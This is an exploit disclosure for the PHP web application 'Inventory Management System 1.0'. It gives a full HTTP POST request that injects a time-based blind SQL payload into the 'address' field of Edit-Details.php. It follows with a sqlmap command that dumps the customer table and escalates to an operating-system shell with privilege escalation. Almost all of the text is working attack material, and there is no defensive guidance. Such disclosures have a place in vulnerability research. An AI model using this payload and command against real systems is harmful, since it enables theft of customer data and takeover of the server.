# Title: Inventory Management System 1.0 Blind SQLi To Rce # Author: Hejap Zairy # Date: 12.07.2022 # Vendor: https://www.vetbossel.in/inventory-management-system-php/ # Software: https://cutt.ly/lOZ8lrr # Reference: https://github.com/Matrix07ksa # Tested on: Windows, MySQL, Apache #vulnerability Code php ```php You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'abhi@123' WHERE `cust`.`custid` = 'C200114'' at line 2 ``` #Status: CRITICAL [+] Payload POST: ``` POST /0day/Edit-Details.php HTTP/1.1 Host: 0day.gov User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 179 Origin: https://0day.gov Connection: close Referer: https://0day.gov/0day/Edit-Details.php Cookie: PHPSESSID=o0p5vujcgkn8pm6llls4nj7qq7 Upgrade-Insecure-Requests: 1 name=ABHI+boss&password=abhi%40123&phone=422234654&email=abhi1%40gmail.com&address=10+HOLME++STREET%27AND (SELECT 5316 FROM (SELECT(SLEEP(5)))Fohe)-- oRCH&cust_update=Submit+Query ``` #Blind SQLi Time to Rce #ُExploit sqlmap -r 0day_hejap.txt --hex --time-sec=17 --dbms=mysql --technique=t --random-agent --eta -p address -D order_mgmt -T cust --dump -hh --os-shell --priv-esc # Description: The Blind Time SQLi vulnerability was converted to rce due to the permissions I have in the database and it was privesc # Proof and Exploit: https://streamable.com/s09u80